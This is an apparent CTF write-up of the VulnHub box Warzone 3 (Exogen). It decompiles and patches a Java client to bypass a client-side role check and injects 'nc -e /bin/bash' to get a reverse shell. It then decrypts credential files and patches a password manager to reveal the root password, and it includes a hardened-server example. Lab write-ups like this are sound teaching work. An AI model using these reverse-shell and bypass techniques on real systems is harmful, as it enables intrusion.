Warzone: 3 (Exogen)

vulnhub address: http://www.vulnhub.com/entry/warzone-3-exogen,606/

0x01 From information gathering to a shell

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open  tcpwrapped

Log in to ftp as anonymous and download the files note.txt and alienclient.jar; note.txt contains the login username alienum and the password exogenesis.

Next, decompile the jar and go to the interesting part.

In the actionPerformed method of Starter.java, the user's role is checked on the client side only (a local authorization problem, confirmed while debugging in IDEA), so add the line role = "astronaut"; just before the role check to escalate privileges.

  public void actionPerformed(ActionEvent e) {
    if (e.getSource() == this.loginButton) {
      String username = this.userTextField.getText();
      String password = this.passwordField.getText();
      try {
        this.socket = new Socket("warzone.local", 4444);
        this.os = new ObjectOutputStream(this.socket.getOutputStream());
        RE login = new RE();
        login.setToken(null);
        login.setOption("LOGIN");
        login.setCmd(null);
        login.setValue(String.valueOf(username) + "@" + password);
        this.os.writeObject(login);
        this.is = new ObjectInputStream(this.socket.getInputStream());
        RE response = (RE)this.is.readObject();
        token = response.getToken();
        role = token.getRole();
        this.os.close();
        this.socket.close();
        if (response.getValue().equals("TRUE")) {
          dashboard();
        } else {
          JOptionPane.showMessageDialog(this, "Invalid Username or Password");
        }
      } catch (IOException|ClassNotFoundException e1) {
        e1.printStackTrace();
      }
    }
    if (e.getSource() == this.resetButton) {
      this.userTextField.setText("");
      this.passwordField.setText("");
    }
    if (e.getSource() == this.showPassword) {
      if (this.showPassword.isSelected()) {
        this.passwordField.setEchoChar('0');
      } else {
        this.passwordField.setEchoChar('*');
      }
    }
    if (e.getSource() == this.viewButton) {
      role = "astronaut"; /* modified here: the role is only checked locally, so overwrite it before the check */
      if (role.equals("researcher")) {
        JOptionPane.showMessageDialog(this, "Permission Denied");
      } else if (role.equals("astronaut")) {
        try {
          this.socket = new Socket("warzone.local", 4444);
          this.os = new ObjectOutputStream(this.socket.getOutputStream());
          RE list = new RE();
          token.setRole(role); /* the server trusts the role carried in the client's token */
          list.setToken(token);
          list.setOption("VIEW");
          list.setCmd("LIST");
          list.setValue(null);
          this.os.writeObject(list);
          this.is = new ObjectInputStream(this.socket.getInputStream());
          RE response = (RE)this.is.readObject();
          this.os.close();
          this.socket.close();
          reportList(response.getValue());
        } catch (IOException e1) {
          e1.printStackTrace();
        } catch (ClassNotFoundException e1) {
          e1.printStackTrace();
        }
      }
    }
    if (e.getSource() == this.uploadButton) {
      JOptionPane.showMessageDialog(this, "Has not been implemented");
    }
  }

Following the code further: clicking a document to view it sends list.setCmd("tail -5 " + f);, i.e. the server runs the cmd field as a shell command. Change it to list.setCmd("nc -e /bin/bash 192.168.56.103 8080");, recompile and run.

  public void reportList(String value) {
    JFrame view = new JFrame("View Reports");
    GridLayout list = new GridLayout(2, 2);
    Container containerLIst = view.getContentPane();
    containerLIst.setLayout(list);
    containerLIst.setBackground(Color.GRAY);
    String[] files = value.split("@");
    for (final String f : files) {
      if (f.contains(".txt")) {
        JButton name = new JButton(f);
        name.addActionListener(new ActionListener() {
          public void actionPerformed(ActionEvent e) {
            try {
              Starter.this.socket = new Socket("warzone.local", 4444);
              Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
              RE list = new RE();
              list.setToken(Starter.token);
              list.setOption("VIEW");
              list.setValue("VALUE");
              list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /* modified here: originally "tail -5 " + f */
              Starter.this.os.writeObject(list);
              Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
              RE response = (RE)Starter.this.is.readObject();
              Starter.this.os.close();
              Starter.this.socket.close();
              Starter.this.reportValue(response.getValue());
            } catch (IOException e1) {
              e1.printStackTrace();
            } catch (ClassNotFoundException e1) {
              e1.printStackTrace();
            }
          }
        });
        containerLIst.add(name);
      }
    }
    view.setVisible(true);
    view.setBounds(10, 10, 370, 600);
    view.setDefaultCloseOperation(3);
    view.setResizable(true);
    view.show();
  }

The reverse shell comes back.

kali@kali:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)
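Both client edits above work for the same reason: the server believes whatever the client sends. The role travels inside the client-controlled token (token.setRole(role)), and the cmd field is executed as a shell command string ("tail -5 " + f, which the edited client swaps for an nc command). The following is an added example, not code from the box or its author, of how a server for this protocol would close both holes: the role is looked up in a server-side session table keyed by an opaque token the server issued at LOGIN, cmd is treated as an opcode from a fixed allowlist, and "last 5 lines of a report" is done with file APIs inside one directory rather than by spawning a shell. The class and field names (HardenedReportServer, Request, the demo accounts and passwords) are assumptions made for this example.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

/** Hypothetical hardened server for the alienclient protocol (added example, not the box's code). */
public class HardenedReportServer {

    /** Same four fields the client's RE object carries; token is now an opaque id that holds no role. */
    static final class Request {
        final String token, option, cmd, value;
        Request(String token, String option, String cmd, String value) {
            this.token = token; this.option = option; this.cmd = cmd; this.value = value;
        }
    }

    private static final Pattern REPORT_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}\\.txt");
    private static final SecureRandom RNG = new SecureRandom();

    // Constructed demo accounts: user -> {password, role}. Real code stores salted password hashes.
    private final Map<String, String[]> users = Map.of(
            "alienum", new String[]{"exogenesis", "researcher"},
            "commander", new String[]{"demo-astronaut-pw", "astronaut"});
    // Server-side session table: issued token -> role. Nothing in a client message can write to it.
    private final Map<String, String> sessions = new HashMap<>();
    private final Path reportDir;

    HardenedReportServer(Path reportDir) {
        this.reportDir = reportDir.toAbsolutePath().normalize();
    }

    /** LOGIN: checks credentials and returns a fresh random token, or null when they are wrong. */
    String login(String user, String password) {
        String[] rec = users.get(user);
        if (rec == null || !rec[0].equals(password)) return null;
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        sessions.put(token, rec[1]);
        return token;
    }

    /** VIEW: the role comes from the session table and cmd is an opcode, never a shell string. */
    String handle(Request r) {
        String role = sessions.get(r.token);
        if (role == null) return "ERR unauthenticated";
        if (!"VIEW".equals(r.option)) return "ERR unknown option";
        if (!"astronaut".equals(role)) return "ERR permission denied";
        switch (r.cmd == null ? "" : r.cmd) {
            case "LIST": return listReports();
            case "READ": return tail(r.value, 5);
            default:     return "ERR unknown command";   // any free-form command text lands here
        }
    }

    /** Lists *.txt reports joined with '@', the separator the original client splits on. */
    private String listReports() {
        try (Stream<Path> s = Files.list(reportDir)) {
            return s.map(p -> p.getFileName().toString())
                    .filter(n -> REPORT_NAME.matcher(n).matches())
                    .sorted()
                    .collect(Collectors.joining("@"));
        } catch (IOException e) {
            return "ERR io";
        }
    }

    /** Replacement for `tail -5 <file>`: file APIs only, and only inside reportDir. */
    private String tail(String name, int lines) {
        if (name == null || !REPORT_NAME.matcher(name).matches()) return "ERR bad report name";
        Path p = reportDir.resolve(name).normalize();
        if (!p.startsWith(reportDir)) return "ERR bad report name";   // second guard against traversal
        try {
            List<String> all = Files.readAllLines(p, StandardCharsets.UTF_8);
            return String.join("\n", all.subList(Math.max(0, all.size() - lines), all.size()));
        } catch (IOException e) {
            return "ERR io";
        }
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("reports");   // constructed sample data
        Files.write(dir.resolve("mission1.txt"), List.of("l1", "l2", "l3", "l4", "l5", "l6", "l7"));
        HardenedReportServer srv = new HardenedReportServer(dir);
        String researcher = srv.login("alienum", "exogenesis");
        String astronaut = srv.login("commander", "demo-astronaut-pw");

        System.out.println(srv.handle(new Request(researcher, "VIEW", "LIST", null)));
        System.out.println(srv.handle(new Request(astronaut, "VIEW", "LIST", null)));
        System.out.println(srv.handle(new Request(astronaut, "VIEW", "READ", "mission1.txt")));
        System.out.println(srv.handle(new Request(astronaut, "VIEW", "tail -5 mission1.txt", null)));
        System.out.println(srv.handle(new Request(astronaut, "VIEW", "READ", "../../etc/passwd")));
        System.out.println(srv.handle(new Request("forged", "VIEW", "LIST", null)));
    }
}
```

Compile and run it with javac/java: the researcher token is refused, the astronaut token gets the report list and the last five lines of mission1.txt, while a shell string in cmd, a traversal in value and a forged token each return an error. The original exchange also moves RE objects with Java native serialization; a server that keeps that format should at least restrict which classes readObject may instantiate with ObjectInputStream.setObjectInputFilter (Java 9+), since the client-side deserialization of untrusted objects is a separate risk from the authorization bug.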

0x02 Getting the anunnaki user

Download aliens.encrypted and wrz3encryptor.jar from /home/exomorph to the local machine (transferred with nc; steps omitted). Decompile wrz3encryptor.jar:

  private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {
    try {
      Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
      Cipher cipher = Cipher.getInstance("AES");
      cipher.init(cipherMode, secretKey);
      FileInputStream inputStream = new FileInputStream(inputFile);
      byte[] inputBytes = new byte[(int)inputFile.length()];
      inputStream.read(inputBytes);
      byte[] outputBytes = cipher.doFinal(inputBytes);
      FileOutputStream outputStream = new FileOutputStream(outputFile);
      outputStream.write(outputBytes);
      inputStream.close();
      outputStream.close();
    } catch (NoSuchPaddingException|java.security.NoSuchAlgorithmException|java.security.InvalidKeyException|javax.crypto.BadPaddingException|javax.crypto.IllegalBlockSizeException|java.io.IOException ex) {
      throw new CryptoException("Error encrypting/decrypting file", ex);
    }
  }

It is really just AES encryption; it seems the whole Warzone series likes to throw in a bit of encryption to confuse people. The decryption code is below:

  public static void decrypt(String key, File inputFile, File outputFile) {
    doDeCrypto(2, key, inputFile, outputFile); // 2 == Cipher.DECRYPT_MODE (the original used 1 == ENCRYPT_MODE)
  }

  private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
    try {
      Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
      Cipher cipher = Cipher.getInstance("AES");
      cipher.init(cipherMode, secretKey);
      FileInputStream inputStream = new FileInputStream(inputFile);
      byte[] inputBytes = new byte[(int)inputFile.length()];
      inputStream.read(inputBytes);
      byte[] outputBytes = cipher.doFinal(inputBytes);
      FileOutputStream outputStream = new FileOutputStream(outputFile);
      outputStream.write(outputBytes);
      inputStream.close();
      outputStream.close();
    } catch (Exception ex) {
      ex.printStackTrace();
    }
  }

The code simply changes cipherMode from 1 to 2, which yields the username and password anunnaki:nak1nak1..

kali@kali:~$ warzone3decrypt strings aliens.txt
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..

After logging in over ssh, go to the user's home directory.

anunnaki@warzone3:~$ ls
info.txt  secpasskeeper.jar.gpg  underboss.txt
anunnaki@warzone3:~$ cat info.txt
Remember to use --batch,
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
anunnaki@warzone3:~$ cat underboss.txt
......
EXOGEN { WARZONE_UNDERBOSS_AL1EN }

0x03 Getting root

Following the hint, decrypt secpasskeeper.jar.gpg:

anunnaki@warzone3:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg # the passphrase is nak1nak1..
anunnaki@warzone3:~$ ls
info.txt  secpasskeeper.jar  secpasskeeper.jar.gpg  underboss.txt

Transfer secpasskeeper.jar to the local machine with nc and reverse it; modify the Main class to:

public class Main {
  public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
    try {
      Scanner in = new Scanner(System.in);
      System.out.println("[Warzone 3] Root's Password Manager");
      System.out.print("Secret passphrase : ");
      String secret = in.nextLine();
      Cryptor cryptor = new Cryptor();
      Resources res = new Resources();
      String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
      String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
      if (true/*user.equals(sys)*/) { /* modified here */
        String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
        System.out.println("[+] Success, the password is : " + plaintext);
      } else {
        System.out.println("[x] Failed");
      }
    } catch (NullPointerException n) {
      System.out.println("[!] Terminated");
      System.exit(0);
    }
  }

  public static String removeSalt(String salted) {
    String unsalted = salted.replace("al13n", "");
    return unsalted;
  }
}

Enter anything and you get the root password ufo_phosXEN:

[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {16 required}
[+] Success, the password is : ufo_phosXEN
anunnaki@warzone3:~$ su - root
Password:
root@warzone3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@warzone3:~# ls
boss.txt  cron  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
root@warzone3:~# cat boss.txt
......
EXOGEN { WARZONE_FINAL_BOSS }
by Alienum with <3
